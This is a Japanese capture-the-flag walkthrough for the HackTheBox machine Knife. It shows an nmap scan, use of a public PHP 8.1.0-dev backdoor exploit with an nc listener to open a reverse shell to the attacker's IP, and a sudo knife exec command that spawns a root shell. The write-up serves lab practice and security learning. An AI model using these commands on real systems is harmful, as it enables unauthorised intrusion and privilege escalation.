HackTheBox - Knife Walkthrough
Knife
Enum
まずはポートスキャンを行う。
$ sudo nmap -sS -f -A -Pn $IP -o nmap.log
22番ポートと80番ポートが開いているので80番から見ていく。
サイト内の開発ツールを開いたところPHP8.10が使われていることが分かるのでこれのexploitを調べてみるとRCEの脆弱性が見つかった。
Penetration
下記のexploitを用いて侵入を試みる。
https://github.com/flast101/php-8.1.0-dev-backdoor-rce
ncで待ち受ける。
$ nc -lvp 4444
ターゲットurl、ホストIP、ホストポート番号を指定してexploitを実行。
$ python3 revshell_php_8.1.0-dev.py http://10.10.10.242/ 10.10.14.3 4444
侵入成功。
Privilege escalation
とりあえずsudo権限で実行出来るコマンドを見ていく。
$ sudo -l
knifeコマンドがsudo権限で実行出来るのでGTFOBinsで調べてみると権限昇格の手法が見つかるのでそれを試す。
$ sudo knife exec -E 'exec "/bin/sh"'
権限昇格成功。
Author And Source
この問題について(HackTheBox - Knife Walkthrough), 我々は、より多くの情報をここで見つけました https://qiita.com/K_1001011/items/7fa696e6223a883c3439著者帰属:元の著者の情報は、元のURLに含まれています。著作権は原作者に属する。
Content is automatically searched and collected through network algorithms . If there is a violation . Please contact us . We will adjust (correct author information ,or delete content ) as soon as possible .